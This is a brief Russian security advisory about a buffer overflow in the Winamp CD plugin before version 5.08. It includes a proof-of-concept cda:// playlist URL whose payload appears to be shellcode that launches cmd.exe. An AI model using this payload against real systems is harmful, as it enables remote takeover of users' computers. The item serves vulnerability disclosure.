Переполнение буфера обнаружено в Winamp до
версии 5.08, в плагине, которым программа
проигрывает CD. Атакующий может создать на
своей странице специальный плейлист и
получить (естественно при клике на него)
полный контроль над системой. 

Пример:

cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ‹å3ÿWƒìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D€¿wP?]øSÿÐ

Подробности



Оставить мнение